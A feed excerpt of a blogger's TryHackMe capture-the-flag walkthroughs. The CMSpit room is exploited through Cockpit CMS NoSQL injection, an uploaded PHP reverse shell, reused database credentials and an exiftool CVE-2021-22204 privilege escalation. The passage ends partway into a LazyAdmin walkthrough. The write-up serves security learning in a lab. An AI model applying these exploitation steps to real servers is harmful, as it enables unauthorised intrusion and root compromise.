      <description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/cmspit" rel="noopener noreferrer"&gt;https://tryhackme.com/room/cmspit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;This is a machine that allows you to practise web app hacking and privilege escalation using recent vulnerabilities.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Let's enumerate the machine first using &lt;code&gt;nmap&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Nmap 7.91 scan initiated Mon Aug  2 11:52:56 2021 as: nmap -p- -A -Pn -oN resultsNmap -vv 10.10.50.229&lt;/span&gt;
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;10.10.50.229
Host is up, received user-set &lt;span class="o"&gt;(&lt;/span&gt;0.16s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Scanned at 2021-08-02 11:52:58 IST &lt;span class="k"&gt;for &lt;/span&gt;390s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD7acH8krj6oVh6s+R3VYnJ/Xc8o5b43RcrRwiMPKe7V8V/SLfeVeHtE06j0PnfF5bHbNjtLP8pMq2USPivt/LcsS+8e+F5yfFFAVawOWqtd9tnrXVQhmyLZVb+wzmjKe+BaNWSnEazjIevMjD3bR8YBYKnf2BoaFKxGkJKPyleMT1GAkU+r47m2FsMa+l7p79VIYrZfss3NTlRq9k6pGsshiJnnzpWmT1KDjI90fGT6oIkALZdW/++qXi+px6+bWDMiW9NVv0eQmN9eTwsFNoWE3JDG7Aeq7hacqF7JyoMPegQwAAHI/ZD66f4zQzqQN6Ou6+sr7IMkC62rLMjKkXN
|   256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEnbbSTSHNXi6AcEtMnOG+srCrE2U4lbRXkBxlQMk1damlhG+U0tmiObRCoasyBY2kvAdU/b7ZWoE0AmoYUldvk&lt;span class="o"&gt;=&lt;/span&gt;
|   256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKYUS/4ObKPMEyPGlgqg6khm41SWn61X9kGbNvyBJh7e
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
|_http-favicon: Unknown favicon MD5: C9CD46C6A2F5C65855276A03FE703735
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to&lt;span class="o"&gt;=&lt;/span&gt;/
|_http-trane-info: Problem with XML parsing of /evox/about

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So we have two ports open.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Port 22 - OpenSSH 7.2p2&lt;/li&gt;
&lt;li&gt;Port 80 - Apache httpd 2.4.18 webserver&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's visit the website hosted on the target machine.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q1:  What is the name of the Content Management System (CMS) installed on the server? &lt;br&gt;
A1: Cockpit&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The login portal has the name shown. Let's take a look at the source code of the home page.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q2: What is the version of the Content Management System (CMS) installed on the server?&lt;br&gt;
A2: 0.11.1&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;We can guess the version by looking at the "ver=" parameter appended to multiple CSS/JS asset URLs in the login page source.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q3: What is the path that allow user enumeration?&lt;br&gt;
A3: &lt;code&gt;/auth/check&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;POST request sent to this URL when login attempt is made. Although UI says login failed, JSON response says "user not found". Therefore it can be used for username enumeration.&lt;/p&gt;

&lt;p&gt;Strange behaviour noticed with password reset form when trying username &lt;code&gt;admin&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh5klbpd9asj3j0arep6i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh5klbpd9asj3j0arep6i.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looks like &lt;code&gt;admin&lt;/code&gt; is a username. Path used by CMS to check this is &lt;code&gt;/auth/requestreset&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;I would say &lt;code&gt;/auth/requestreset&lt;/code&gt; can also be used for username enumeration.&lt;/p&gt;

&lt;p&gt;Tried username fuzzing on &lt;code&gt;/auth/check&lt;/code&gt;. Same response for &lt;code&gt;admin&lt;/code&gt; as it is for everything else. Will try fuzzing on &lt;code&gt;/auth/requestreset&lt;/code&gt; instead. Using ZAP Proxy's Fuzz feature for this.&lt;/p&gt;

&lt;p&gt;No luck.&lt;/p&gt;

&lt;p&gt;Searching for exploits for Cockpit CMS on the Internet, I found a Metasploit module written by Packet Storm Security for this exact version =&amp;gt; &lt;a href="https://packetstormsecurity.com/files/162282/Cockpit-CMS-0.11.1-NoSQL-Injection-Remote-Command-Execution.html" rel="noopener noreferrer"&gt;https://packetstormsecurity.com/files/162282/Cockpit-CMS-0.11.1-NoSQL-Injection-Remote-Command-Execution.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;More details regarding the exploits(CVE-2020-35846 and CVE-2020-35847) from the author of the module =&amp;gt; &lt;a href="https://swarm.ptsecurity.com/rce-cockpit-cms/" rel="noopener noreferrer"&gt;https://swarm.ptsecurity.com/rce-cockpit-cms/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looking at the exploit and the article, it seems the CMS uses MongoDB as its backend database.&lt;/p&gt;

&lt;p&gt;Trying this in Metasploit&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frzdr6fgrvqwbtu0o567n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frzdr6fgrvqwbtu0o567n.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Configuring options and running the exploit&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt8qqvueykuf13yahrnb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt8qqvueykuf13yahrnb.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Wow this is one handy exploit :D. It managed to get user-info and even changed the password for the &lt;code&gt;admin&lt;/code&gt; user.&lt;/p&gt;

&lt;p&gt;Thanks to the exploit, we can answer some of the questions now&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q4: How many users can you identify when you reproduce the user enumeration attack?&lt;br&gt;
A4: 4&lt;/p&gt;

&lt;p&gt;Q5: What is the path that allows you to change user account passwords?&lt;br&gt;
A5: &lt;code&gt;/auth/requestreset&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;You can see the above URL path in the Metasploit exploit code.&lt;/p&gt;

&lt;p&gt;Next question is about Skidy's email, which is not the same as &lt;code&gt;admin&lt;/code&gt; user email. Let's answer that later once we have it.&lt;/p&gt;

&lt;p&gt;Now, the exploit reset the password for the &lt;code&gt;admin&lt;/code&gt; account on the CMS and printed it out. Let's use it to login.&lt;/p&gt;

&lt;p&gt;Admin login successful!&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5dr63tzgjnu2y61k7rjs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5dr63tzgjnu2y61k7rjs.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the admin dashboard, we can go to account settings (&lt;a href="http://MACHINE-IP/accounts/account" rel="noopener noreferrer"&gt;http://MACHINE-IP/accounts/account&lt;/a&gt;), then choose "Accounts" in the breadcrumb at the top of the page. Here we see the emails for all the users, including Skidy's as well.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q6: Compromise the Content Management System (CMS). What is Skidy's email.&lt;br&gt;
A6:  s$$$y@t$$$$$$$e.f$$$$$il&lt;/p&gt;

&lt;p&gt;Q7: What is the web flag?&lt;br&gt;
A7: $CENSORED$&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;To find the web flag, click on banner aka Cockpit logo -&amp;gt; Finder. The flag is in one of the files.&lt;/p&gt;

&lt;p&gt;Since this is a CMS, we should be able to upload a PHP reverse shell file. Use the same Finder menu that we used earlier to upload it. On a Kali machine, you can find it at &lt;code&gt;/usr/share/webshells/php/&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;I uploaded it to &lt;code&gt;/storage/uploads/&lt;/code&gt; and accessed it at &lt;code&gt;http://machine-ip/storage/uploads/evilshell.php&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;We have the reverse shell. Contents of &lt;code&gt;/etc/passwd&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
&lt;span class="nb"&gt;sync&lt;/span&gt;:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System &lt;span class="o"&gt;(&lt;/span&gt;admin&lt;span class="o"&gt;)&lt;/span&gt;:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:Coock,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mongodb:x:109:65534::/var/lib/mongodb:/bin/false
clamav:x:110:118::/var/lib/clamav:/bin/false
debian-spamd:x:111:119::/var/lib/spamassassin:/bin/sh
opensmtpd:x:112:120:OpenSMTD Daemon,,,:/var/lib/opensmtpd/empty:/bin/false
opensmtpq:x:113:121:OpenSMTD queue user,,,:/var/lib/opensmtpd/empty:/bin/false
www-data@ubuntu:/&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/login.defs | &lt;span class="nb"&gt;grep &lt;/span&gt;UID
UID_MIN                  1000
UID_MAX                 60000
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So &lt;code&gt;stux&lt;/code&gt; is the only non-root user. Listing their home dir&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu2gcfsmelic5wkk2tawo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu2gcfsmelic5wkk2tawo.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;user.txt&lt;/code&gt; is there, but we can't read it as &lt;code&gt;www-data&lt;/code&gt;. Also a &lt;code&gt;.mongorc.js&lt;/code&gt; that has 777 permissions. There is also a &lt;code&gt;.dbshell&lt;/code&gt; file here which we can read. We know from the Metasploit module that we used earlier that this machine has a MongoDB server running.&lt;/p&gt;

&lt;p&gt;According to &lt;a href="https://docs.mongodb.com/manual/reference/mongo-shell/#mongo-shell-command-history" rel="noopener noreferrer"&gt;MongoDB Docs&lt;/a&gt;, this stores the command history. Let's see what's inside.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5btlmnp83jse547kw3xn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5btlmnp83jse547kw3xn.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Oooh! We seem to have found the MongoDB credentials for the &lt;code&gt;stux&lt;/code&gt; user. And a flag that is stored in the DB.&lt;/p&gt;

&lt;p&gt;With this we can answer another question&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q8: Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?&lt;br&gt;
A8: Answer in &lt;code&gt;/home/stux/.dbshell&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Note: We did not actually have to login to the DB to get the flag, although that also seems to be possible.&lt;/p&gt;

&lt;p&gt;Now, its very probable the user re-used the password for MongoDB and SSH. So let's try to login to &lt;code&gt;ssh&lt;/code&gt; with the credentials for &lt;code&gt;stux&lt;/code&gt; we found in &lt;code&gt;.dbshell&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Successful login. So we now we can answer&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q9:  What is the user.txt flag? &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Since the ssh password is a bit complicated, setting up ssh keys for easier login.&lt;/p&gt;

&lt;p&gt;Now that we have a foothold in the machine. Let's try for privilege escalation.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewuslib5nq5p4tdxfgy6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewuslib5nq5p4tdxfgy6.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looks like we can use &lt;code&gt;sudo&lt;/code&gt; to execute &lt;code&gt;exiftool&lt;/code&gt; as &lt;code&gt;root&lt;/code&gt; with no password. Let's see if GTFOBins has an entry for this.&lt;/p&gt;

&lt;p&gt;Yes it does =&amp;gt; &lt;a href="https://gtfobins.github.io/gtfobins/exiftool/#sudo" rel="noopener noreferrer"&gt;https://gtfobins.github.io/gtfobins/exiftool/#sudo&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But I'm not really sure how to achieve privesc with this exploit. It seems we can read files that we normally do not have access to and move them to a location of our choice.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: We can use this method to get our root flag.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Let's try using a search engine to see there are any recent privesc exploits for &lt;code&gt;exiftool&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Looks like there was &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22204" rel="noopener noreferrer"&gt;CVE-2021-22204&lt;/a&gt; that was originally disclosed on &lt;a href="https://hackerone.com/reports/1154542" rel="noopener noreferrer"&gt;HackerOne&lt;/a&gt;. Looks like the reporter was able to use a modified DjVu file uploaded to Gitlab to get a reverse shell on their machine. &lt;/p&gt;

&lt;p&gt;Original Reporter's blog post on this =&amp;gt; &lt;a href="https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html" rel="noopener noreferrer"&gt;https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It seems the exploit makes use of a particular vulnerable function in &lt;code&gt;exiftool&lt;/code&gt;'s code that is responsible for parsing the metadata of the DjVu file, which can then be made to execute arbitrary code. &lt;/p&gt;

&lt;p&gt;Looks like something we can use to escalate privileges, since we can execute &lt;code&gt;exiftool&lt;/code&gt; with &lt;code&gt;sudo&lt;/code&gt; permissions.&lt;/p&gt;

&lt;p&gt;The article that I used as a guide to make the exploit work =&amp;gt; &lt;a href="https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/" rel="noopener noreferrer"&gt;https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Verifying that the exploit works&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnkpwbbip59dzkvr18mvz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnkpwbbip59dzkvr18mvz.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It works! Now, let's use this to copy &lt;code&gt;bash&lt;/code&gt; into &lt;code&gt;/tmp/&lt;/code&gt; and set its SUID bit.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: The required dependencies are installed on the target machine, so we are making use of them. In a real scenario, you will need to install &lt;code&gt;djvulibre-bin&lt;/code&gt; as instructed in the blog post.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhepprjr7vu55ibgte0ds.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhepprjr7vu55ibgte0ds.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And now let's use this to get the root flag&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi5bbzesfi13ldkuky0x2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi5bbzesfi13ldkuky0x2.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So answering the remaining questions&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q10: What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000&lt;br&gt;
A10: CVE-2021-22204&lt;/p&gt;

&lt;p&gt;Q11: What is the utility used to create the PoC file?&lt;br&gt;
A11: &lt;code&gt;djvumake&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Q12: Escalate your privileges. What is the flag in root.txt?&lt;br&gt;
A12: Use root shell to get the flag in &lt;code&gt;/root/root.txt&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Thanks for reading!&lt;/p&gt;

&lt;p&gt;This room was super-fun to solve. I recommend you try it as well =&amp;gt; &lt;a href="https://tryhackme.com/room/cmspit" rel="noopener noreferrer"&gt;https://tryhackme.com/room/cmspit&lt;/a&gt;&lt;/p&gt;

</description>
      <category>infosec</category>
      <category>security</category>
      <category>ctf</category>
      <category>tryhackme</category>
    </item>
    <item>
      <title>TryHackMe LazyAdmin Room Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Sat, 31 Jul 2021 10:17:33 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-lazyadmin-room-walkthrough-am3</link>
      <guid>https://dev.to/wandering-geek/tryhackme-lazyadmin-room-walkthrough-am3</guid>
      <description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/lazyadmin"&gt;https://tryhackme.com/room/lazyadmin&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Easy linux machine to practice your skills&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;1) Enumeration&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Nmap 7.91 scan initiated Mon Jul 26 09:12:46 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv 10.10.42.242&lt;/span&gt;
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-2295969&lt;/span&gt; microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-2295969&lt;/span&gt; microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-2297756&lt;/span&gt; microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-2297756&lt;/span&gt; microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-2296971&lt;/span&gt; microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-2296971&lt;/span&gt; microseconds.  Ignoring time.
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;10.10.42.242
Host is up, received user-set &lt;span class="o"&gt;(&lt;/span&gt;0.14s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Scanned at 2021-07-26 09:12:46 IST &lt;span class="k"&gt;for &lt;/span&gt;532s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE    REASON         VERSION
22/tcp open  ssh        syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE&lt;span class="o"&gt;=&lt;/span&gt;
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  tcpwrapped syn-ack ttl 60
|_http-title: &lt;span class="s2"&gt;"Apache2 Ubuntu Default Page: It works"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;2) Foothold / Getting a shell&lt;/p&gt;

&lt;p&gt;Observations. Only two services. SSH and Apache webserver.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Port 22 - OpenSSH 7.2p2
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;searchsploit openssh 7.2p2
&lt;span class="nt"&gt;-----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
 Exploit Title                                                                                                                           |  Path
&lt;span class="nt"&gt;-----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
OpenSSH 2.3 &amp;lt; 7.7 - Username Enumeration                                                                                                 | linux/remote/45233.py
OpenSSH 2.3 &amp;lt; 7.7 - Username Enumeration &lt;span class="o"&gt;(&lt;/span&gt;PoC&lt;span class="o"&gt;)&lt;/span&gt;                                                                                           | linux/remote/45210.py
OpenSSH 7.2p2 - Username Enumeration                                                                                                     | linux/remote/40136.py
OpenSSH &amp;lt; 7.4 - &lt;span class="s1"&gt;'UsePrivilegeSeparation Disabled'&lt;/span&gt; Forwarded Unix Domain Sockets Privilege Escalation                                     | linux/local/40962.txt
